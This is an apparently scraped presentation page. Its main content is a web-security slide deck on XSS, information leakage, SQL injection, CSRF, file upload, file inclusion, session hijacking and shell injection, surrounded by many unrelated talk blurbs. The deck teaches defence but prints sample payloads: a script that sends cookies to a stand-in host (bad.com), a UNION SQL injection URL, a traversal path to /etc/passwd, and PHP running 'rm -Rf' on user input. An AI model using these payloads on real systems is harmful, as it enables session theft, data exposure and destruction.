Web Application Security DOs and DON’Ts
While you do not know attacks, how can you know about defense?
http://web.folio3.com/services/web-application-development/
Application Security Vulnerabilities: OWASP Top 10 -2007Vaibhav Gupta
General concepts of web application security vulnerabilities primarily based on OWASP Top 10 list-2007(I know its too old :-))
I, along with Sandeep and Vishal, presented on this at IIIT-Delhi college in April, 2014
Table Of Content
The OWASP Top Ten
Invalidated Redirect and Forwards
Security Misconfiguration
Application Fingerprint
Error handling And Logging
Noise
PHP Guidelines
Application Security Vulnerabilities: OWASP Top 10 -2007Vaibhav Gupta
General concepts of web application security vulnerabilities primarily based on OWASP Top 10 list-2007(I know its too old :-))
I, along with Sandeep and Vishal, presented on this at IIIT-Delhi college in April, 2014
Table Of Content
The OWASP Top Ten
Invalidated Redirect and Forwards
Security Misconfiguration
Application Fingerprint
Error handling And Logging
Noise
PHP Guidelines
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
Web App Security - A presentation by Ryan Holland, Sr. Director, Cloud Architecture at Alert Logic for the Vancouver AWS User Group Meetup on May 31, 2017.
Authorization is the process of giving someone permission to do or have something.
Table of Content
Introduction Authorization
Common Attacker Testing Authentication
Strategies For Strong Authentication
Access Control
Threat modeling is an approach for analyzing the security of an application.
It is a structured approach that enables you to identify, quantify, and address the security risks associated with an application
Threat modeling is not an approach to reviewing code, but it does complement the security code review process.
The inclusion of threat modeling in the SDLC can help to ensure that applications are being developed with security built-in from the very beginning.
Your users are almost certainly vulnerable in one way or another. Mike North explores a series of common web app security pitfalls, first demonstrating how to exploit the vulnerability and then recommending a pragmatic and effective defense against the attack. Buckle up, because Mike's about to take some things you love and depend on and smash them to bits.
The OWASP Top Ten is the de-facto web application security standard because it reflects the evolving threat landscape, providing organizations a framework to manage and mitigate application security risk.
This presentation examines the critical newcomers and pesky incumbents from both an offensive and defensive perspective. Our experts share their insight on how to harden Web applications and align your program towards OWASP compliance.
Study of Directory Traversal Attack and Tools Used for Attackijtsrd
In a lot of cases, configuration files, leftover files, temporary files and many other of such types are left without any security due to many reasons like for fellow developer so that it can be easy access to him or you are still working on it or sometimes overwork so you don’t remember or in hurry act sometime irresponsible but this can help attacker a lot to get information which can further lead to huge attacks. An automated Dictionary Traversal tool can find those files easily and provide a great help to attacker. There are many tools of such kind like Dir Buster, Go Buster, DIRB etc. These tools are not only used for attack but also for pen testing. Pen tester could easily find these kinds of vulnerabilities with such tools and remove them to make the application secure. Sanchi Sood | Mrs. N. Priya "Study of Directory Traversal Attack & Tools Used for Attack" Published in International Journal of Trend in Scientific Research and Development (ijtsrd), ISSN: 2456-6470, Volume-5 | Issue-1 , December 2020, URL: https://www.ijtsrd.com/papers/ijtsrd37933.pdf Paper URL : https://www.ijtsrd.com/computer-science/computer-security/37933/study-of-directory-traversal-attack-and-tools-used-for-attack/sanchi-sood
Table of Content
Web Application Firewall
possible security measures of WAF
Data Validation Strategies
Varieties Of Input
Reject Known Bad
Accept Known Good
Sanitization Safe Data Handling
Semantic Checks
Introduction SQL Injection
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
SQL Injection
Blind SQL Injection
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...Quek Lilian
A live hacking session demonstrating the different tools and techniques used by hackers and an in-depth understanding of the problems of insecure application and the solutions to solve the vulnerability.
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
Web App Security - A presentation by Ryan Holland, Sr. Director, Cloud Architecture at Alert Logic for the Vancouver AWS User Group Meetup on May 31, 2017.
Authorization is the process of giving someone permission to do or have something.
Table of Content
Introduction Authorization
Common Attacker Testing Authentication
Strategies For Strong Authentication
Access Control
Threat modeling is an approach for analyzing the security of an application.
It is a structured approach that enables you to identify, quantify, and address the security risks associated with an application
Threat modeling is not an approach to reviewing code, but it does complement the security code review process.
The inclusion of threat modeling in the SDLC can help to ensure that applications are being developed with security built-in from the very beginning.
Your users are almost certainly vulnerable in one way or another. Mike North explores a series of common web app security pitfalls, first demonstrating how to exploit the vulnerability and then recommending a pragmatic and effective defense against the attack. Buckle up, because Mike's about to take some things you love and depend on and smash them to bits.
The OWASP Top Ten is the de-facto web application security standard because it reflects the evolving threat landscape, providing organizations a framework to manage and mitigate application security risk.
This presentation examines the critical newcomers and pesky incumbents from both an offensive and defensive perspective. Our experts share their insight on how to harden Web applications and align your program towards OWASP compliance.
Study of Directory Traversal Attack and Tools Used for Attackijtsrd
In a lot of cases, configuration files, leftover files, temporary files and many other of such types are left without any security due to many reasons like for fellow developer so that it can be easy access to him or you are still working on it or sometimes overwork so you don’t remember or in hurry act sometime irresponsible but this can help attacker a lot to get information which can further lead to huge attacks. An automated Dictionary Traversal tool can find those files easily and provide a great help to attacker. There are many tools of such kind like Dir Buster, Go Buster, DIRB etc. These tools are not only used for attack but also for pen testing. Pen tester could easily find these kinds of vulnerabilities with such tools and remove them to make the application secure. Sanchi Sood | Mrs. N. Priya "Study of Directory Traversal Attack & Tools Used for Attack" Published in International Journal of Trend in Scientific Research and Development (ijtsrd), ISSN: 2456-6470, Volume-5 | Issue-1 , December 2020, URL: https://www.ijtsrd.com/papers/ijtsrd37933.pdf Paper URL : https://www.ijtsrd.com/computer-science/computer-security/37933/study-of-directory-traversal-attack-and-tools-used-for-attack/sanchi-sood
Table of Content
Web Application Firewall
possible security measures of WAF
Data Validation Strategies
Varieties Of Input
Reject Known Bad
Accept Known Good
Sanitization Safe Data Handling
Semantic Checks
Introduction SQL Injection
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
SQL Injection
Blind SQL Injection
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...Quek Lilian
A live hacking session demonstrating the different tools and techniques used by hackers and an in-depth understanding of the problems of insecure application and the solutions to solve the vulnerability.
Application and Website Security -- Fundamental EditionDaniel Owens
This is the first presentation in the 200 level, specifically targeting developers with a more hardcore training program. This program includes numerous case studies and live demonstrations and is considered technical, but does not require a working knowledge of the languages discussed.
Seminar on various security issues faced by PHP developers and ways to avoid them.
The Examples used in the seminar can be downloaded from -> http://www.sanisoft.com/blog/wp-content/uploads/2009/08/security.tar.gz
Many notable and new web hacking techniques, discoveries and compromises were uncovered in 2008. During his session, the top 10 vulnerabilities present in 2008, as well as some of the prevalent security issues emerging in 2009. Attendees will virtually be able to walk through the vulnerabilities appearing on today’s corporate websites, learning real-world solutions to today’s web application security issues.
Moderator: Mike Stephenson, SC lab manager, SC Magazine
- Jeremiah Grossman, founder and chief technology officer, WhiteHat Security
A set of good practices in a Liferay project following some of the OWASP Top 10 Web Application Security Risks recommendations.
The slides were used in a meetup of the Liferay User Group Spain.
Follow @LUGSpain in twitter
Author: @jajcampoy
Shopify & Shopify Plus Ecommerce Development Experts Folio3 Software
As Shopify developers and experts specializing in Shopify design and development services, we have been enabling businesses outpace their competition and deliver value to their customers for over five years. Our Shopify and Shopify Plus experts offer full spectrum Shopify development services and solutions to clients across a wide range of industries. From Shopify design, Shopify customization and Shopify app development, to full-fledged Shopify migration and Shopify support services, we are your go-to Shopify development partner.
Our white-glove approach and hands on bedside manner makes us the perfect partner to help turn around your ecommerce business. Whether you’re looking to enhance your Shopify store’s customer experience, convert your ecommerce idea into a fully functional Shopify web store, or want to migrate your existing ecommerce site to Shopify or Shopify Plus, our Shopify experts can help you get there. Our service focus for Shopify development is based on providing services related to:
Shopify Design
Shopify Customization
Shopify Integration Solutions
Shopify App Development
Shopify Migration (from other ecommerce platforms)
Shopify Support
At Folio3 we specialize in all aspects of Magento development, from Magento design and web store development, to Magento customization, Magento integration and custom Magento extensions. As a Magento 2 Trained Solution Partner with over 10 years of ecommerce expertise, and a dedicated team of certified Magento development experts (including certified Magento & Magento 2 developers, architects and project managers), we can assist you with practically any Magento development requirement. Our Magento service focus is based on:
Magento (1 & 2) Customization
Magento Integration Solutions
Magento Design
Magento (1 & 2) Development
Magento Migration (from other platforms)
Magento Performance Optimization
Magento Support
Custom Magento Extensions & Modules
The presentation helps us in understanding the different concepts associated with TypeScript. What is TypeScript? Why is TypeScript used and the different applications of TypeScript. For more information you can simply visit: http://mobile.folio3.com/
ASP.NET over the years
- Introduced ASP.NET WebForms in 2002
- Object-oriented
- Similar design time experience for WinForms developers
- Rich set of user interface controls and infrastructure features
- Server-side event model
- Monolithic Framework
- Tighly coupled with System.Web.dll and IIS
- Included as part of the .NET framework
- Tied to .NET Framework releases
History
- Name derived from Gopher
- Created by Google Engineers
- A language for the multi core processor
- Search for Faster, Compiled and ease of Programming
Getting Started
- Pre Requisites
- Installation Steps
- Features Overviews
- Business Connectivity Services
- Business Intelligence
- Identity Management
- UI enhancements for Mobile Devices
- Web Content Management
- Workflows
Getting Started with SharePoint Development
- What we can Customize?
- Tools for SharePoint Customization
Agenda
- BlackBerry OS History
- BlackBerry 10 & QNX
- Comparison With Other Mobile OS
- Enterprise Mobility & Security
- Demo
- How To Develop Apps?
- Case Study – A Secure Messaging App
- Future
- Study the architecture and design
- Compare Old & New Technology stack
- Analyze evolution of architecture and scalability
- Lessons learned over time
First attempt -> RIM (1990)
- Blackberry Platform + Blackberry Enterprise Server (BES)
- Corporate-owned personally-enabled (COPE) Model
- Mainly enterprise data, and communication; no or little operations
- Pros & Cons
1. Very effective; secure
2. Very costly
Agenda
- Virtualization VS Containerization
- LXC Engine: A Hypervisor for Containers
- What is Docker?
- Problem: Shipping Software
- Solution
- Why Docker?
- Virtual Machines Vs Docker
- Docker Architecture
- How we Implemented?
Enterprises usually have more than one application
- Custom build applications
- Legacy systems
- ERP, CRM systems like SAP, Salesforce etc.
Users expect instant access to all business functions an enterprise can offer.
This requires disparate applications to be connected into a larger, integrated solution.
This integration is usually achieved through the use of some form of "middleware“.
Agenda
- What is NOSQL?
- Motivations for NOSQL?
- Brewer’s CAP Theorem
- Taxonomy of NOSQL databases
- Apache Cassandra
- Features
- Data Model
- Consistency
- Operations
- Cluster Membership
- What Does NOSQL means for RDBMS?
Existing HTTP Protocol Architecture
Traditional Methods for Server Push
- Polling
- Long Polling / Comet
- Pushlets / Streaming
Comet in detail
- Possible issues with Comet and their solutions
- Comet Demonstration : MediaMorph
Where does HTML5 fit-in?
HTML 5 Server Sockets
Experience our free, in-depth three-part Tendenci Platform Corporate Membership Management workshop series! In Session 1 on May 14th, 2024, we began with an Introduction and Setup, mastering the configuration of your Corporate Membership Module settings to establish membership types, applications, and more. Then, on May 16th, 2024, in Session 2, we focused on binding individual members to a Corporate Membership and Corporate Reps, teaching you how to add individual members and assign Corporate Representatives to manage dues, renewals, and associated members. Finally, on May 28th, 2024, in Session 3, we covered questions and concerns, addressing any queries or issues you may have.
For more Tendenci AMS events, check out www.tendenci.com/events
Globus Compute wth IRI Workflows - GlobusWorld 2024Globus
As part of the DOE Integrated Research Infrastructure (IRI) program, NERSC at Lawrence Berkeley National Lab and ALCF at Argonne National Lab are working closely with General Atomics on accelerating the computing requirements of the DIII-D experiment. As part of the work the team is investigating ways to speedup the time to solution for many different parts of the DIII-D workflow including how they run jobs on HPC systems. One of these routes is looking at Globus Compute as a way to replace the current method for managing tasks and we describe a brief proof of concept showing how Globus Compute could help to schedule jobs and be a tool to connect compute at different facilities.
In software engineering, the right architecture is essential for robust, scalable platforms. Wix has undergone a pivotal shift from event sourcing to a CRUD-based model for its microservices. This talk will chart the course of this pivotal journey.
Event sourcing, which records state changes as immutable events, provided robust auditing and "time travel" debugging for Wix Stores' microservices. Despite its benefits, the complexity it introduced in state management slowed development. Wix responded by adopting a simpler, unified CRUD model. This talk will explore the challenges of event sourcing and the advantages of Wix's new "CRUD on steroids" approach, which streamlines API integration and domain event management while preserving data integrity and system resilience.
Participants will gain valuable insights into Wix's strategies for ensuring atomicity in database updates and event production, as well as caching, materialization, and performance optimization techniques within a distributed system.
Join us to discover how Wix has mastered the art of balancing simplicity and extensibility, and learn how the re-adoption of the modest CRUD has turbocharged their development velocity, resilience, and scalability in a high-growth environment.
Designing for Privacy in Amazon Web ServicesKrzysztofKkol1
Data privacy is one of the most critical issues that businesses face. This presentation shares insights on the principles and best practices for ensuring the resilience and security of your workload.
Drawing on a real-life project from the HR industry, the various challenges will be demonstrated: data protection, self-healing, business continuity, security, and transparency of data processing. This systematized approach allowed to create a secure AWS cloud infrastructure that not only met strict compliance rules but also exceeded the client's expectations.
Enhancing Research Orchestration Capabilities at ORNL.pdfGlobus
Cross-facility research orchestration comes with ever-changing constraints regarding the availability and suitability of various compute and data resources. In short, a flexible data and processing fabric is needed to enable the dynamic redirection of data and compute tasks throughout the lifecycle of an experiment. In this talk, we illustrate how we easily leveraged Globus services to instrument the ACE research testbed at the Oak Ridge Leadership Computing Facility with flexible data and task orchestration capabilities.
Check out the webinar slides to learn more about how XfilesPro transforms Salesforce document management by leveraging its world-class applications. For more details, please connect with sales@xfilespro.com
If you want to watch the on-demand webinar, please click here: https://www.xfilespro.com/webinars/salesforce-document-management-2-0-smarter-faster-better/
Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...Hivelance Technology
Cryptocurrency trading bots are computer programs designed to automate buying, selling, and managing cryptocurrency transactions. These bots utilize advanced algorithms and machine learning techniques to analyze market data, identify trading opportunities, and execute trades on behalf of their users. By automating the decision-making process, crypto trading bots can react to market changes faster than human traders
Hivelance, a leading provider of cryptocurrency trading bot development services, stands out as the premier choice for crypto traders and developers. Hivelance boasts a team of seasoned cryptocurrency experts and software engineers who deeply understand the crypto market and the latest trends in automated trading, Hivelance leverages the latest technologies and tools in the industry, including advanced AI and machine learning algorithms, to create highly efficient and adaptable crypto trading bots
Understanding Globus Data Transfers with NetSageGlobus
NetSage is an open privacy-aware network measurement, analysis, and visualization service designed to help end-users visualize and reason about large data transfers. NetSage traditionally has used a combination of passive measurements, including SNMP and flow data, as well as active measurements, mainly perfSONAR, to provide longitudinal network performance data visualization. It has been deployed by dozens of networks world wide, and is supported domestically by the Engagement and Performance Operations Center (EPOC), NSF #2328479. We have recently expanded the NetSage data sources to include logs for Globus data transfers, following the same privacy-preserving approach as for Flow data. Using the logs for the Texas Advanced Computing Center (TACC) as an example, this talk will walk through several different example use cases that NetSage can answer, including: Who is using Globus to share data with my institution, and what kind of performance are they able to achieve? How many transfers has Globus supported for us? Which sites are we sharing the most data with, and how is that changing over time? How is my site using Globus to move data internally, and what kind of performance do we see for those transfers? What percentage of data transfers at my institution used Globus, and how did the overall data transfer performance compare to the Globus users?
We describe the deployment and use of Globus Compute for remote computation. This content is aimed at researchers who wish to compute on remote resources using a unified programming interface, as well as system administrators who will deploy and operate Globus Compute services on their research computing infrastructure.
How Recreation Management Software Can Streamline Your Operations.pptxwottaspaceseo
Recreation management software streamlines operations by automating key tasks such as scheduling, registration, and payment processing, reducing manual workload and errors. It provides centralized management of facilities, classes, and events, ensuring efficient resource allocation and facility usage. The software offers user-friendly online portals for easy access to bookings and program information, enhancing customer experience. Real-time reporting and data analytics deliver insights into attendance and preferences, aiding in strategic decision-making. Additionally, effective communication tools keep participants and staff informed with timely updates. Overall, recreation management software enhances efficiency, improves service delivery, and boosts customer satisfaction.
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...Globus
The Earth System Grid Federation (ESGF) is a global network of data servers that archives and distributes the planet’s largest collection of Earth system model output for thousands of climate and environmental scientists worldwide. Many of these petabyte-scale data archives are located in proximity to large high-performance computing (HPC) or cloud computing resources, but the primary workflow for data users consists of transferring data, and applying computations on a different system. As a part of the ESGF 2.0 US project (funded by the United States Department of Energy Office of Science), we developed pre-defined data workflows, which can be run on-demand, capable of applying many data reduction and data analysis to the large ESGF data archives, transferring only the resultant analysis (ex. visualizations, smaller data files). In this talk, we will showcase a few of these workflows, highlighting how Globus Flows can be used for petabyte-scale climate analysis.
Globus Connect Server Deep Dive - GlobusWorld 2024Globus
We explore the Globus Connect Server (GCS) architecture and experiment with advanced configuration options and use cases. This content is targeted at system administrators who are familiar with GCS and currently operate—or are planning to operate—broader deployments at their institution.
Large Language Models and the End of ProgrammingMatt Welsh
Talk by Matt Welsh at Craft Conference 2024 on the impact that Large Language Models will have on the future of software development. In this talk, I discuss the ways in which LLMs will impact the software industry, from replacing human software developers with AI, to replacing conventional software with models that perform reasoning, computation, and problem-solving.
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERRORTier1 app
Even though at surface level ‘java.lang.OutOfMemoryError’ appears as one single error; underlyingly there are 9 types of OutOfMemoryError. Each type of OutOfMemoryError has different causes, diagnosis approaches and solutions. This session equips you with the knowledge, tools, and techniques needed to troubleshoot and conquer OutOfMemoryError in all its forms, ensuring smoother, more efficient Java applications.
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...Globus
Large Language Models (LLMs) are currently the center of attention in the tech world, particularly for their potential to advance research. In this presentation, we'll explore a straightforward and effective method for quickly initiating inference runs on supercomputers using the vLLM tool with Globus Compute, specifically on the Polaris system at ALCF. We'll begin by briefly discussing the popularity and applications of LLMs in various fields. Following this, we will introduce the vLLM tool, and explain how it integrates with Globus Compute to efficiently manage LLM operations on Polaris. Attendees will learn the practical aspects of setting up and remotely triggering LLMs from local machines, focusing on ease of use and efficiency. This talk is ideal for researchers and practitioners looking to leverage the power of LLMs in their work, offering a clear guide to harnessing supercomputing resources for quick and effective LLM inference.
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...Shahin Sheidaei
Games are powerful teaching tools, fostering hands-on engagement and fun. But they require careful consideration to succeed. Join me to explore factors in running and selecting games, ensuring they serve as effective teaching tools. Learn to maintain focus on learning objectives while playing, and how to measure the ROI of gaming in education. Discover strategies for pitching gaming to leadership. This session offers insights, tips, and examples for coaches, team leads, and enterprise leaders seeking to teach from simple to complex concepts.
2. Web Application Security
It’s a vast topic
While you do not know attacks, how can
you know about defense?
High level and common vulnerabilities
How to avoid these?
@folio_3 www.folio3.com Copyright 2015
3. It is Important
75% of cyber attacks and internet security
violations are generated through Internet
applications
Source: Gartner Group
@folio_3 www.folio3.com Copyright 2015
4. Vulnerabilities are common!
iViZ Security study (2012) shows
99% of the Apps tested had at least 1 vulnerability
82% of the web application had at least 1
High/Critical Vulnerability
90% of hacking incidents never gets known to
public
Average number of vulnerability per website: 35
30% of the hacked organizations knew the
vulnerability (for which they got hacked)
beforehand
#1 Vulnerability: Cross site scripting (61%)@folio_3 www.folio3.com Copyright 2015
5. Top Vulnerabilities
0% 10% 20% 30% 40% 50% 60% 70%
Cross Site Request Forgery
Information Leakage
Cross Site Scripting
25%
51%
65%
Percentage of websites containing the Vulnerabilities
@folio_3 www.folio3.com Copyright 2015
7. Cross-Site Scripting (XSS)
An attacker can inject executable code (JS,
HTML, etc.) into a webpage.
Example:
http://site.com/search.php?q=<script>alert(“XS
S”)</script>
<img src=“http://bad.com/xss.js”>
Types:
Non-Persistent
Persistent
@folio_3 www.folio3.com Copyright 2015
8. Cross-Site Scripting (XSS)
Non-Persistent
Attacker is able to execute his own code into a
webpage but no changes can be done in that website.
Example
http://www.site.com/viewtopic.php?id=4"><script>docum
ent.location="http://bad.com/logger.php?cookie="+doc
ument.cookie;</script>
Or
http://www.site.com/viewtopic.php?id=4”><script>docum
ent.write(“<img
src=‘http://bad.com/logger.php?cookie=“+
document.cookie+”’/>”);</script>
@folio_3 www.folio3.com Copyright 2015
9. Cross-Site Scripting (XSS)
Persistent
Attacker stores executable code in the website
database which is being executed every time
webpage is showing the data.
Common targets
Comments
User submitted content
Signup forms etc.
@folio_3 www.folio3.com Copyright 2015
11. Cross-Site Scripting (XSS)
Comment in raw format:
and I like the way this website developers
work..hahaha :D :D
<script src=“http://bad.com/xss.js”></script>
Should have been printed like
<script
src="http://bad.com/xss.js"></scri
pt>
@folio_3 www.folio3.com Copyright 2015
13. Information Leakage
An application reveals sensitive data, such as
technical details of the web application,
environment, or user-specific data.
Example
Warning: mysql_connect() [function.mysql-connect]:
Access denied for user 'root'@'localhost' (using
password: YES) in /usr/www/kint/view.php on line
8
Warning: include(pages/../../../../../../etc/passwd1)
[function.include]: failed to open stream: No such
file or directory in /usr/www/users/kint/view.php on
line 20
@folio_3 www.folio3.com Copyright 2015
14. Information Leakage
Faulty directory listing configuration
All files in directory visible
Improper error handling
Error message may contain paths, user, server
info
Specifically in php file path is reveled
Filetype handling
HTTP Headers
X-Powered-By, X-Generator etc
Sensitive HTML comments, etc.
@folio_3 www.folio3.com Copyright 2015
15. Information Leakage
Directory listing configuration
Put a blank file named index.html in that directory.
Disable indexing in .htaccess
Options –indexes
All sub-directories of that directory will also get their
directory listings turned off.
Error handling
Configure error message using error_reporting,
display_errors, log_errors and error_log in php.ini
Configure error handling in .htaccess as well
@folio_3 www.folio3.com Copyright 2015
16. Information Leakage
Remove headers which reveal information
X-Powered-By, X-Generator etc
Use header_remove() PHP function
Comments in source
Never put much information in html or js
Comments should be in php so that they are not
visible to visitor
@folio_3 www.folio3.com Copyright 2015
17. Information Leakage
Filestypes
Never keep files which can be downloaded in public
directory, unless it is for public.
Include files (.inc, .class, .db etc.)
Compressed files(.zip, .rar, .tar.gz, etc.)
Database files(.sql, .cvs, .xml, .xls, etc.)
Unknown files(.bak, .inc, .copy, .bkp, etc.)
Configure htaccess
<Files ~ ".(inc|sql)$">
order allow,deny
deny from all
</Files>
@folio_3 www.folio3.com Copyright 2015
18. SQL Injection
Attacker is able to inject custom sql into a
query.
Example
http://site.com/product.php?id=10+AND+1=2+union+s
elect+1,2,database(),version(),user(),6+--
@folio_3 www.folio3.com Copyright 2015
19. SQL Injection
Select id, meta_title, name, details, category,
metadescription WHERE id = 10 and deleted =
0
becomes
Select id, meta_title, name, details, category,
metadescription WHERE id = 10 and 1=2
UNION select 1,2, database(), version(),
user(), 6 --and deleted = 0
@folio_3 www.folio3.com Copyright 2015
21. SQL Injection
Escape the input
mysql_real_escape_string()
filter_var()
Intval, floatval
Filter input (use whitelists not blacklists)
Use prepared statements, parameterized
queries etc. Most frameworks/cms have it.
Limit database permissions (start with the
lowest permissions)
@folio_3 www.folio3.com Copyright 2015
22. Cross-Site Request Forgery
(CSRF)
Allow other websites to send unauthorized
requests to it, using the active session of its
authorized users.
Example
User visits a site where attacker has already
injected his code (hacked.com) in another
tab/window
A review is posted for bad.com
@folio_3 www.folio3.com Copyright 2015
24. Cross-Site Request Forgery
(CSRF)
Solution
Use hash tokens into each generated form.
Check token when form is submitted
Check referrer header (partial protection)
@folio_3 www.folio3.com Copyright 2015
25. Unrestricted File Upload
Allows attacker to upload malicious files to the
server.
Most of the time scripts to take control server.
Example
$usrFile = $_FILES[‘userfile’][‘name’];
$uploadFolder= "uploads/";
if(move_uploaded_file($usrFile,$uploadFolder))
{ echo “File has been successfully uploaded.“;
} else{ echo “Error. Please try again!"; }
@folio_3 www.folio3.com Copyright 2015
26. Unrestricted File Upload
Solution
White list the extensions which can be uploaded
Check for double extensions
Check mime type (partial solution)
Rename file before saving
Restrict access to uploaded files (htaccess)
<Files ~ "^w+.(gif|jpe?g|png)$">
order deny,allow
allow from all
</Files>
@folio_3 www.folio3.com Copyright 2015
27. File Inclusion
Allows an attacker to include local or remote
file into the vulnerable webpage code.
EXAMPLE:
http://site.com/view.php?file=../../../../../etc/passwd
Files can be server configuration files such as
system users information, filesystem structure,
code etc
@folio_3 www.folio3.com Copyright 2015
30. File Inclusion
Use open_basedir settings in php.ini
Filter input for functions mentioned in previous
slide.
Use whitelisted filenames or allow only valid
file name characters (don’t allow ../ etc)
Modify the php.ini configuration file:
allow_url_fopen = Off
allow_url_include = Off
register_globals = Off (in older versions its “ON” by default)
@folio_3 www.folio3.com Copyright 2015
31. Phishing
Social Engineering technique to steal
confidential information through the use of fake
login page.
EXAMPLE:
http://www.gooqle.com/accounts/ServiceLogin?se
rvice=mail
@folio_3 www.folio3.com Copyright 2015
32. Phishing
Exact replica is served to the visitor,
data is sent to hacker
@folio_3 www.folio3.com Copyright 2015
33. Phishing
Use HTTPS instead of HTTP
So that user may see the details of the domain
owner in the SSL certificate information.
Use short URL addresses for login pages
So that users could easily recognize login page
address.
Use Yahoo! Sign-in Seal like system
It is a unique identifier chosen by the user.
@folio_3 www.folio3.com Copyright 2015
34. Session Hijacking
Allows unauthorized access of an authorized
user by having active session identifier (SID)
EXAMPLE:
http://wg180.site.com/dk;jsessionid=0754aff827cf
e9f7db7f48e7018ed1e6.wg180?st.cmd=userMain
&tkn=8809
@folio_3 www.folio3.com Copyright 2015
35. Session Hijacking
Store SID in HTTP cookies
Don’t accept SIDs from GET and POST requests, use
cookies:
session.use_cookies = 1
session.use_only_cookies = 1
This will prevent session fixation by url
Regenerate SID after login or on each request
Put session_regenerate_id(true); after the
session_start()
Accept only SIDs generated by own server
Use $_SESSION['SERVER_GENERATED_SID'] to
identify whether SID has been created by your web@folio_3 www.folio3.com Copyright 2015
36. Session Hijacking
Destroy old SIDs
Keep session time out small
ini_set("session.cookie_lifetime","600");
Completely destroy the session on user logout
Use SSL for user authentication and
afterwards
It will prevent network sniffing
@folio_3 www.folio3.com Copyright 2015
37. Shell Injection
Allows an attacker to execute shell commands in
the web server.
Example
http://site.com/delete.php?file=/
<?php
//delete.php
$file = $_GET[‘file’];
echo 'erasing ' . $file . ‘<br />’;
system(“rm -Rf $file”) ;
echo ‘done‘;
?>
@folio_3 www.folio3.com Copyright 2015
38. Shell Injection
Potential target functions
shell_exec(), exec(), system(), passthru(), eval()
Solution
Disable shell functions, use disable_functions in
php.ini
Allow only white listed commands to be used
Use PHP built-in function to escape the user input
Escapeshellarg() , escapeshellcmd()
@folio_3 www.folio3.com Copyright 2015
39. In a Nutshell
Never trust inputs
Get, Post, Cookies, File upload
Every input can be faked
Filter, Sanitize, Validate each input
Use white lists
Don’t allow html unless required
Don’t expose internal information of applications
Handle exceptions
Test and Monitor application for security
Keep cms, frameworks, plugins updated (at least
security fixes)
@folio_3 www.folio3.com Copyright 2015
40. Vulnerability Scanners
Acunetix WVS
Skipfish
AppScan
HP WebInspect
Nikto (Wikto)
Netsparker
W3af
Grendel-Scan
Websecurify
Burp Suite
Uniscan
and more
@folio_3 www.folio3.com Copyright 2015
Web applications are accessible and open for anyone
In many cases Source Code is OpenSource
Research Methodology
300+ Customers
5,000 + Application Security Tests
25% Apps from Asia, 40% Apps from USA and 25% from Europe
Example of information leakage https://www.google.com/search?q=%22admin+account+info%22+filetype%3Alog
http://code.jellycan.com/memcached/
1.Directory listing misconfiguration: Leaving directory listing enabled allows the attacker to read the list of all files in a directory.
1.Directory listing misconfiguration: Leaving directory listing enabled allows the attacker to read the list of all files in a directory.
Select id, meta_title, name, details, category, metadescription WHERE id = 10 and deleted = 0
Will become
Select id, meta_title, name, details, category, metadescription WHERE id = 10 and 1=2
UNION select 1,2, database(), version(), user(), 6 --and deleted = 0